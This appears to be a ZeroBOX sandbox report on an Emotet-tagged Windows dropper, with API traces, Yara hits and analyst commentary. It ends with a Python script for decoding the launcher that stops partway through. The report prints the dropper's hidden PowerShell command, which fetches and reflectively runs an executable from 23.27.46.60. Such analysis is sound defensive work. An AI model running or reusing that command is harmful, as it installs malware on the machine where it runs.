Summary | ZeroBOX

rocktrainingss.exe

Tags Emotet, Gen1, Generic Malware, Malicious Library, Antivirus, UPX, PE File, PE64, CAB
Category FILE
Machine s1_win7_x6403_us
Started March 3, 2025, 2:42 p.m.
Completed March 3, 2025, 2:49 p.m.
Size 156.0KB
Type PE32+ executable (GUI) x86-64, for MS Windows
MD5 5cae6ec63c10893a71f48917fd993e3f
SHA256 370e0cedd9a4f6ab338cfff223f9afce18e1e3b7555558ecfad469279d76573e
CRC32 370656A9
ssdeep 1536:L2poznR4j6ej3Zi2iLOZoMmX1OdM/s5gV/ae/XD6BqExV4Lkrzd:LMobR7ezAjLOZvmX1e5YBL4xV4wrzd
PDB Path wextract.pdb
Yara
  • Malicious_Library_Zero - Malicious_Library
  • PE_Header_Zero - PE File Signature
  • IsPE64 - (no description)
  • Win32_Trojan_Emotet_RL_Gen_Zero - Win32 Trojan Emotet
  • CAB_file_format - CAB archive file
  • Win32_Trojan_Gen_1_0904B0_Zero - Win32 Trojan Emotet
  • UPX_Zero - UPX packed file

Name Response Post-Analysis Lookup
No hosts contacted (no DNS lookups; the only connection in the trace is to a bare IP address).
IP Address Status Action
23.27.46.60 Active Moloch

Suricata Alerts

No Suricata Alerts

Suricata TLS

No Suricata TLS

Time & API Arguments Status Return Repeated

GetComputerNameW

computer_name: TEST22-PC
1 1 0

GetComputerNameW

computer_name: TEST22-PC
1 1 0

GetComputerNameW

computer_name: TEST22-PC
1 1 0

GetComputerNameW

computer_name: TEST22-PC
1 1 0

GetComputerNameA

computer_name: TEST22-PC
1 1 0

GetComputerNameW

computer_name: TEST22-PC
1 1 0

GetComputerNameW

computer_name: TEST22-PC
1 1 0
Time & API Arguments Status Return Repeated

IsDebuggerPresent

0 0
Time & API Arguments Status Return Repeated

WriteConsoleW

buffer: C:\Users\test22\AppData\Local\Temp\IXP000.TMP>
console_handle: 0x0000000000000007
1 1 0

WriteConsoleW

buffer: '■' is not recognized as an internal or external command, operable program or batch file.
console_handle: 0x000000000000000b
1 1 0
Time & API Arguments Status Return Repeated

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x0000000000327a10
flags: 0
crypto_export_handle: 0x0000000000000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x00000000003aef60
flags: 0
crypto_export_handle: 0x0000000000000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x00000000003aef60
flags: 0
crypto_export_handle: 0x0000000000000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x00000000003aef60
flags: 0
crypto_export_handle: 0x0000000000000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x00000000003aefd0
flags: 0
crypto_export_handle: 0x0000000000000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x00000000003aefd0
flags: 0
crypto_export_handle: 0x0000000000000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x00000000003af2e0
flags: 0
crypto_export_handle: 0x0000000000000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x00000000003af2e0
flags: 0
crypto_export_handle: 0x0000000000000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x00000000003af2e0
flags: 0
crypto_export_handle: 0x0000000000000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x00000000003af2e0
flags: 0
crypto_export_handle: 0x0000000000000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x00000000003af350
flags: 0
crypto_export_handle: 0x0000000000000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x00000000003af350
flags: 0
crypto_export_handle: 0x0000000000000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x00000000003af350
flags: 0
crypto_export_handle: 0x0000000000000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x00000000003af510
flags: 0
crypto_export_handle: 0x0000000000000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x00000000003af510
flags: 0
crypto_export_handle: 0x0000000000000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x00000000003af510
flags: 0
crypto_export_handle: 0x0000000000000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x00000000003af0b0
flags: 0
crypto_export_handle: 0x0000000000000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x00000000003af0b0
flags: 0
crypto_export_handle: 0x0000000000000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x00000000003af0b0
flags: 0
crypto_export_handle: 0x0000000000000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x00000000003af0b0
flags: 0
crypto_export_handle: 0x0000000000000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x00000000003af0b0
flags: 0
crypto_export_handle: 0x0000000000000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x00000000003af0b0
flags: 0
crypto_export_handle: 0x0000000000000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x00000000003af0b0
flags: 0
crypto_export_handle: 0x0000000000000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x00000000003af0b0
flags: 0
crypto_export_handle: 0x0000000000000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x00000000003afac0
flags: 0
crypto_export_handle: 0x0000000000000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x00000000003afac0
flags: 0
crypto_export_handle: 0x0000000000000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x00000000003afac0
flags: 0
crypto_export_handle: 0x0000000000000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x00000000003afb30
flags: 0
crypto_export_handle: 0x0000000000000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x00000000003afb30
flags: 0
crypto_export_handle: 0x0000000000000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x00000000003afa50
flags: 0
crypto_export_handle: 0x0000000000000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x00000000003afa50
flags: 0
crypto_export_handle: 0x0000000000000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x00000000003afb30
flags: 0
crypto_export_handle: 0x0000000000000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x00000000003afb30
flags: 0
crypto_export_handle: 0x0000000000000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x00000000003afb30
flags: 0
crypto_export_handle: 0x0000000000000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x0000000000327850
flags: 0
crypto_export_handle: 0x0000000000000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x0000000000327850
flags: 0
crypto_export_handle: 0x0000000000000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x0000000000327850
flags: 0
crypto_export_handle: 0x0000000000000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x0000000000327850
flags: 0
crypto_export_handle: 0x0000000000000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x000000001b57d590
flags: 0
crypto_export_handle: 0x0000000000000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x000000001b57d590
flags: 0
crypto_export_handle: 0x0000000000000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x0000000000327930
flags: 0
crypto_export_handle: 0x0000000000000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x0000000000327930
flags: 0
crypto_export_handle: 0x0000000000000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x0000000000327930
flags: 0
crypto_export_handle: 0x0000000000000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x0000000000327930
flags: 0
crypto_export_handle: 0x0000000000000000
blob_type: 6
1 1 0
registry HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography\MachineGuid
pdb_path wextract.pdb
Time & API Arguments Status Return Repeated

GlobalMemoryStatusEx

1 1 0
resource name AVI
suspicious_features Connection to IP address
suspicious_request GET http://23.27.46.60/a0001/0228/rocktraining.exe
request GET http://23.27.46.60/a0001/0228/rocktraining.exe
Time & API Arguments Status Return Repeated

NtAllocateVirtualMemory

process_identifier: 2124
region_size: 2293760
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x0000000002600000
allocation_type: 8192 (MEM_RESERVE)
process_handle: 0xffffffffffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2124
region_size: 8192
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x00000000027b0000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffffffffffff
1 0 0

NtProtectVirtualMemory

process_identifier: 2124
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x000007fef3471000
process_handle: 0xffffffffffffffff
1 0 0

NtProtectVirtualMemory

process_identifier: 2124
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x000007fef36ee000
process_handle: 0xffffffffffffffff
1 0 0

NtProtectVirtualMemory

process_identifier: 2124
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x000007fef36ee000
process_handle: 0xffffffffffffffff
1 0 0

NtProtectVirtualMemory

process_identifier: 2124
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x000007fef36ef000
process_handle: 0xffffffffffffffff
1 0 0

NtProtectVirtualMemory

process_identifier: 2124
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x000007fef36ef000
process_handle: 0xffffffffffffffff
1 0 0

NtProtectVirtualMemory

process_identifier: 2124
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x000007fef36ef000
process_handle: 0xffffffffffffffff
1 0 0

NtProtectVirtualMemory

process_identifier: 2124
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x000007fef36ef000
process_handle: 0xffffffffffffffff
1 0 0

NtProtectVirtualMemory

process_identifier: 2124
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x000007fef36ef000
process_handle: 0xffffffffffffffff
1 0 0

NtProtectVirtualMemory

process_identifier: 2124
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x000007fef36ef000
process_handle: 0xffffffffffffffff
1 0 0

NtProtectVirtualMemory

process_identifier: 2124
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x000007fef36ef000
process_handle: 0xffffffffffffffff
1 0 0

NtProtectVirtualMemory

process_identifier: 2124
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x000007fef36ef000
process_handle: 0xffffffffffffffff
1 0 0

NtProtectVirtualMemory

process_identifier: 2124
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x000007fef36f0000
process_handle: 0xffffffffffffffff
1 0 0

NtProtectVirtualMemory

process_identifier: 2124
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x000007fef36f0000
process_handle: 0xffffffffffffffff
1 0 0

NtProtectVirtualMemory

process_identifier: 2124
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x000007fef36f0000
process_handle: 0xffffffffffffffff
1 0 0

NtProtectVirtualMemory

process_identifier: 2124
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x000007fef36f0000
process_handle: 0xffffffffffffffff
1 0 0

NtProtectVirtualMemory

process_identifier: 2124
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x000007fef36f0000
process_handle: 0xffffffffffffffff
1 0 0

NtProtectVirtualMemory

process_identifier: 2124
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x000007fef36f1000
process_handle: 0xffffffffffffffff
1 0 0

NtProtectVirtualMemory

process_identifier: 2124
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x000007fef36f1000
process_handle: 0xffffffffffffffff
1 0 0

NtProtectVirtualMemory

process_identifier: 2124
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x000007fef36f1000
process_handle: 0xffffffffffffffff
1 0 0

NtProtectVirtualMemory

process_identifier: 2124
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x000007fef36f1000
process_handle: 0xffffffffffffffff
1 0 0

NtProtectVirtualMemory

process_identifier: 2124
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x000007fef36ee000
process_handle: 0xffffffffffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2124
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x000007ff00012000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffffffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2124
region_size: 589824
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x000007fffff10000
allocation_type: 1056768 (MEM_RESERVE|MEM_TOP_DOWN)
process_handle: 0xffffffffffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2124
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x000007fffff10000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffffffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2124
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x000007fffff10000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffffffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2124
region_size: 65536
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x000007fffff00000
allocation_type: 1056768 (MEM_RESERVE|MEM_TOP_DOWN)
process_handle: 0xffffffffffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2124
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x000007fffff00000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffffffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2124
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x000007ff000ca000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffffffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2124
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x000007ff00002000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffffffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2124
region_size: 8192
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x00000000027b2000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffffffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2124
region_size: 12288
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x00000000027b4000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffffffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2124
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x000007ff000da000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffffffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2124
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x000007ff00013000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffffffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2124
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x000007ff00014000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffffffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2124
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x000007ff00102000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffffffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2124
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x000007ff000dd000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffffffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2124
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x000007ff000cb000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffffffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2124
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x000007ff000c2000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffffffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2124
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x000007ff00015000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffffffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2124
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x000007ff00150000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffffffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2124
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x000007ff00003000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffffffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2124
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x000007ff00016000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffffffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2124
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x000007ff00103000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffffffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2124
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x000007ff000cc000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffffffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2124
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x000007ff000c3000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffffffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2124
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x000007ff0000a000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffffffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2124
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x000007ff00017000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffffffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2124
region_size: 16384
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x00000000027b7000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffffffffffff
1 0 0
file C:\Users\test22\AppData\Local\Temp\IXP000.TMP\rocktrainings.bat
file C:\Users\test22\AppData\Local\Temp\IXP000.TMP\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk
cmdline powershell -WindowStyle Hidden -ep bypass -nop -Command "& {Invoke-Expression ([System.Text.Encoding]::UTF8.GetString([Convert]::FromBase64String('JHdjPU5ldy1PYmplY3QgU3lzdGVtLk5ldC5XZWJDbGllbnQKJHdjLkhlYWRlcnMuQWRkKCdVc2VyLUFnZW50JywnTW96aWxsYS81LjAgKFdpbmRvd3MgTlQ7IFdpbmRvd3MgTlQgMTAuMDsgZW4tVVMpIFdpbmRvd3NQb3dlclNoZWxsLzUuMS4xNzEzNC4xMTInKQokYnl0ZXM9JHdjLkRvd25sb2FkRGF0YSgnaHR0cDovLzIzLjI3LjQ2LjYwL2EwMDAxLzAyMjgvcm9ja3RyYWluaW5nLmV4ZScpCiRhc3NlbT1bUmVmbGVjdGlvbi5Bc3NlbWJseV06OkxvYWQoJGJ5dGVzKQokYXNzZW0uRW50cnlQb2ludC5JbnZva2UoJG51bGwsJG51bGwp')))}"
Time & API Arguments Status Return Repeated

CreateProcessInternalW

thread_identifier: 2128
thread_handle: 0x000000000000006c
process_identifier: 2124
current_directory: C:\Users\test22\AppData\Local\Temp\IXP000.TMP
filepath: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
track: 1
command_line: powershell -WindowStyle Hidden -ep bypass -nop -Command "& {Invoke-Expression ([System.Text.Encoding]::UTF8.GetString([Convert]::FromBase64String('JHdjPU5ldy1PYmplY3QgU3lzdGVtLk5ldC5XZWJDbGllbnQKJHdjLkhlYWRlcnMuQWRkKCdVc2VyLUFnZW50JywnTW96aWxsYS81LjAgKFdpbmRvd3MgTlQ7IFdpbmRvd3MgTlQgMTAuMDsgZW4tVVMpIFdpbmRvd3NQb3dlclNoZWxsLzUuMS4xNzEzNC4xMTInKQokYnl0ZXM9JHdjLkRvd25sb2FkRGF0YSgnaHR0cDovLzIzLjI3LjQ2LjYwL2EwMDAxLzAyMjgvcm9ja3RyYWluaW5nLmV4ZScpCiRhc3NlbT1bUmVmbGVjdGlvbi5Bc3NlbWJseV06OkxvYWQoJGJ5dGVzKQokYXNzZW0uRW50cnlQb2ludC5JbnZva2UoJG51bGwsJG51bGwp')))}"
filepath_r: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
stack_pivoted: 0
creation_flags: 524288 (EXTENDED_STARTUPINFO_PRESENT)
inherit_handles: 1
process_handle: 0x0000000000000068
1 1 0
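The CreateProcessInternalW entry above is the pivot of the whole trace. The sample is a wextract (IExpress) self-extractor, as the wextract.pdb path, the CAB Yara hit, the IXP000.TMP working directory and the RunOnce wextract_cleanup0 entry all show; it drops rocktrainings.bat, and the batch starts PowerShell with a base64 payload that the launcher decodes with UTF8.GetString and hands to Invoke-Expression. cmd.exe's complaint about '■' shows that the batch's first token failed to parse, which did not stop the PowerShell line from running. The Yara tags are rule hits on the file; the behaviour the trace actually records is a dropper handing off to an in-memory .NET loader, and the RunOnce value is the stub's own temp-directory cleanup (advpack.dll DelNodeRunDLL32), not persistence.

The following is an added worked example, not code from the report or from the sample. It decodes the payload from the recorded command_line and pulls out the indicators a triage note needs. Its only input is the command line as printed above; the regexes, marker names and function names are the example's own choices, and it assumes the FromBase64String/UTF8.GetString launcher shape seen here (a -EncodedCommand launcher carries UTF-16LE instead and is not handled).

```python
"""Decode and triage the PowerShell launcher recorded in the sandbox trace.

Added worked example, not part of the ZeroBOX report or of the sample. The only
input is the command_line string from the CreateProcessInternalW entry; the
regexes, marker lists and function names are this example's own choices.
"""
import base64
import binascii
import re

# Constructed input: the command line as the sandbox recorded it, split across
# string literals only for readability (the base64 text itself is unchanged).
SANDBOX_CMDLINE = (
    'powershell -WindowStyle Hidden -ep bypass -nop -Command "& {Invoke-Expression '
    "([System.Text.Encoding]::UTF8.GetString([Convert]::FromBase64String('"
    "JHdjPU5ldy1PYmplY3QgU3lzdGVtLk5ldC5XZWJDbGllbnQK"
    "JHdjLkhlYWRlcnMuQWRkKCdVc2VyLUFnZW50JywnTW96aWxsYS81LjAgKFdpbmRvd3MgTlQ7IFdpbmRvd3MgTlQgMTAuMDsgZW4tVVMpIFdpbmRvd3NQb3dlclNoZWxsLzUuMS4xNzEzNC4xMTInKQok"
    "Ynl0ZXM9JHdjLkRvd25sb2FkRGF0YSgnaHR0cDovLzIzLjI3LjQ2LjYwL2EwMDAxLzAyMjgvcm9ja3RyYWluaW5nLmV4ZScpCiRh"
    "c3NlbT1bUmVmbGVjdGlvbi5Bc3NlbWJseV06OkxvYWQoJGJ5dGVzKQokYXNzZW0uRW50cnlQb2ludC5JbnZva2UoJG51bGwsJG51bGwp"
    "')))}\""
)

# The launcher wraps its payload as FromBase64String('<b64>') and decodes it with
# UTF8.GetString, so the payload is UTF-8 text. A "-EncodedCommand <b64>" launcher
# would carry UTF-16LE instead; this example does not handle that form.
FROM_B64_RE = re.compile(r"FromBase64String\('([A-Za-z0-9+/=]+)'\)")
URL_RE = re.compile(r"https?://[^\s'\"()]+")
UA_RE = re.compile(r"'User-Agent'\s*,\s*'([^']*)'")

# Substrings that together make up the in-memory .NET loader seen in the trace:
# fetch bytes over HTTP, Assembly.Load them, call the assembly's entry point.
LOADER_MARKERS = {
    "webclient_download": "DownloadData(",
    "reflective_assembly_load": "[Reflection.Assembly]::Load(",
    "entrypoint_invoke": ".EntryPoint.Invoke(",
}
# Launcher-side flags that are individually common but rarely all present in
# legitimate administrative use. Marker names are this example's own.
LAUNCHER_MARKERS = {
    "execution_policy_bypass": "-ep bypass",
    "no_profile": "-nop",
    "hidden_window": "-WindowStyle Hidden",
    "invoke_expression": "Invoke-Expression",
    "base64_wrapper": "FromBase64String(",
}


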